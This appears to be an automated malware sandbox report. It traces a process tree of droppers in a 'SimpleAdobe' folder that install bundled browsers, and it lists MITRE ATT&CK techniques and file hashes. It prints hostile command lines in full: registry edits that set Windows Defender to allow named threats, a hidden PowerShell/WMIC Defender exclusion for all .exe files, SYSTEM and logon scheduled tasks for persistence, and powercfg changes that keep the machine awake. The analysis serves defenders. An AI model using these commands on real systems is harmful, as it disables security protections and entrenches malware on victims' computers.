C:\Users\Admin\AppData\Local\Temp\7zS0071C419\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS0071C419\setup.exe --server-tracking-blob=MzlmMDZlYzAyZmFhNzg5MjY2NmNhMWE5MjQ2MzBlNjgyMzRiNTVkNTU5YzYyZTI3MjdhZTU4MjBiYjRhZjVjYzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fbWVkaXVtPXBiJnV0bV9zb3VyY2U9Y2luc3QmdXRtX2NhbXBhaWduPU9wZXJhX0Rlc2t0b3AmdXRtX2NvbnRlbnQ9NWQ3NzZmZmE0ZDQ4OF8mdXRtX2lkPTI4WGprMnpWQnpxNGs4V1ZWTVk5OVMiLCJ0aW1lc3RhbXAiOiIxNzE5MTU4NTY4LjMwODkiLCJ1c2VyYWdlbnQiOiJNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMTIwLjAuMC4wIFNhZmFyaS81MzcuMzYiLCJ1dG0iOnsiY2FtcGFpZ24iOiJPcGVyYV9EZXNrdG9wIiwiY29udGVudCI6IjVkNzc2ZmZhNGQ0ODhfIiwiaWQiOiIyOFhqazJ6VkJ6cTRrOFdWVk1ZOTlTIiwibWVkaXVtIjoicGIiLCJzb3VyY2UiOiJjaW5zdCJ9LCJ1dWlkIjoiODcxYzkwMmYtY2E2Yi00ZWJjLWEwNGQtZjMxNTQyN2RlNmZjIn0=3⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3876 -
C:\Users\Admin\AppData\Local\Temp\7zS0071C419\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS0071C419\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x320,0x324,0x328,0x2fc,0x32c,0x70a0a128,0x70a0a134,0x70a0a1404⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4380
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5752
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406231604011\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406231604011\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
PID:5376
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406231604011\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406231604011\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5800 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406231604011\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406231604011\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x9b9f88,0x9b9f94,0x9b9fa05⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3424
-
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\aspR8VuNtToCuGKBbyNGSSvH.exeC:\Users\Admin\Documents\SimpleAdobe\aspR8VuNtToCuGKBbyNGSSvH.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:840 -
C:\Users\Admin\AppData\Local\Temp\7zS2AEE.tmp\Install.exe.\Install.exe3⤵
- Executes dropped EXE
PID:5284 -
C:\Users\Admin\AppData\Local\Temp\7zS385C.tmp\Install.exe.\Install.exe /mcvGZdidBQSpd "385135" /S4⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
PID:6012 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵PID:6008
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"6⤵PID:3148
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:4432
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵PID:5240
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"6⤵PID:5920
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:1752
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵PID:4592
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"6⤵PID:1164
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:900
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵PID:1032
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"6⤵PID:5596
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:528
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵PID:5208
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵PID:1596
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:3912
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3140 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bytIiJgDVfAVkgdamS" /SC once /ST 16:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS385C.tmp\Install.exe\" I2 /uhdidIcc 385135 /S" /V1 /F5⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:5428
-
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\4M33CeE5nfQU1rd_j1NV6HLa.exeC:\Users\Admin\Documents\SimpleAdobe\4M33CeE5nfQU1rd_j1NV6HLa.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2388 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe3⤵PID:1580
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\pceUgwNB1y0YfqLCqhRMQKLF.exeC:\Users\Admin\Documents\SimpleAdobe\pceUgwNB1y0YfqLCqhRMQKLF.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
PID:3024 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:4520
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:2668
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3012
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3860,i,5047420736443372512,9747851268033796534,262144 --variations-seed-version --mojo-platform-channel-handle=4368 /prefetch:81⤵PID:1188
-
C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe"C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /svc1⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Modifies data under HKEY_USERS
PID:5132 -
C:\Program Files (x86)\AVG\Browser\Update\Install\{BC0E9756-8EC0-4B7B-B6B8-706433A2C246}\AVGBrowserInstaller.exe"C:\Program Files (x86)\AVG\Browser\Update\Install\{BC0E9756-8EC0-4B7B-B6B8-706433A2C246}\AVGBrowserInstaller.exe" --chrome --do-not-launch-chrome --hide-browser-override --show-developer-mode --suppress-first-run-bubbles --default-search-id=3 --default-search=bing.com --adblock-mode-default=0 --no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data=msedge --import-cookies --auto-launch-chrome --system-level2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5772 -
C:\Program Files (x86)\AVG\Browser\Update\Install\{BC0E9756-8EC0-4B7B-B6B8-706433A2C246}\CR_91020.tmp\setup.exe"C:\Program Files (x86)\AVG\Browser\Update\Install\{BC0E9756-8EC0-4B7B-B6B8-706433A2C246}\CR_91020.tmp\setup.exe" --install-archive="C:\Program Files (x86)\AVG\Browser\Update\Install\{BC0E9756-8EC0-4B7B-B6B8-706433A2C246}\CR_91020.tmp\SECURE.PACKED.7Z" --chrome --do-not-launch-chrome --hide-browser-override --show-developer-mode --suppress-first-run-bubbles --default-search-id=3 --default-search=bing.com --adblock-mode-default=0 --no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data=msedge --import-cookies --auto-launch-chrome --system-level3⤵
- Boot or Logon Autostart Execution: Active Setup
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
PID:4304 -
C:\Program Files (x86)\AVG\Browser\Update\Install\{BC0E9756-8EC0-4B7B-B6B8-706433A2C246}\CR_91020.tmp\setup.exe"C:\Program Files (x86)\AVG\Browser\Update\Install\{BC0E9756-8EC0-4B7B-B6B8-706433A2C246}\CR_91020.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=fake_url --annotation=plat=Win64 --annotation=prod=AVG --annotation=ver=125.0.25426.176 --initial-client-data=0x264,0x268,0x26c,0x240,0x270,0x7ff783345390,0x7ff78334539c,0x7ff7833453a84⤵
- Executes dropped EXE
PID:428
-
-
-
-
C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exeC:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5616 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3104
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5496
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1276
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3976
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:4348
-
-
C:\Windows\system32\svchost.exesvchost.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5512
-
-
C:\Users\Admin\AppData\Local\Temp\7zS385C.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS385C.tmp\Install.exe I2 /uhdidIcc 385135 /S1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2184 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:3408
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:5620
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:5980
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:6040
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:5952
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:5776
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:4404
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:116
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:2728
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:5208
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:5168
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:5204
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:924
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:6128
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:6132
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
PID:976 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:2284
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:5572
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:832
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:1760
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:5088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4940
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2792
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4332
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Event Triggered Execution
2Component Object Model Hijacking
1Image File Execution Options Injection
1Power Settings
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Event Triggered Execution
2Component Object Model Hijacking
1Image File Execution Options Injection
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
2Disable or Modify System Firewall
1Modify Registry
5Pre-OS Boot
1Bootkit
1Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
204KB
MD5cbcdf56c8a2788ed761ad3178e2d6e9c
SHA1bdee21667760bc0df3046d6073a05d779fdc82cb
SHA256e9265a40e5ee5302e8e225ea39a67d452eaac20370f8b2828340ba079abbbfd3
SHA5125f68e7dffdd3424e0eb2e5cd3d05f8b6ba497aab9408702505341b2c89f265ebb4f9177611d51b9a56629a564431421f3ecb8b25eb08fb2c54dfeddecb9e9f2e
-
Filesize
27B
MD5fc8ee03b2a65f381e4245432d5fef60e
SHA1d2b7d9be66c75ccf24fcb45a6d0dacedd8b6dd6f
SHA256751a04263c2ebb889fdcd11045d6f3602690318ebaaa54f66e1332d76dde9ef4
